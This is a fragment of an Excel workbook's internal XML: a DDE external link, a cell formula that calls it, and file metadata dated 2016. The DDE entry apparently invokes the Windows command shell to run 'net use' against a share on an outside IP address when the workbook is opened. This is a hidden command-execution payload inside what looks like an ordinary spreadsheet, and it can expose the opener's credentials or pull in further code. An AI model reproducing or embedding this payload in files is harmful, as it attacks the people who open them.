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md" ddeTopic=" /C net use X: \\195.95.131.110\Share">
    <ddeItems>
      <ddeItem name="A0" advise="1"/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"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A1" t="e">
        <f>[1]!A0</f>
        <v>#REF!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</dc:creator>
  <cp:lastModifiedBy>gavin</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-03-18T10:17:45Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-03-18T10:26:53Z</dcterms:modified>
</cp:coreProperties>
</file>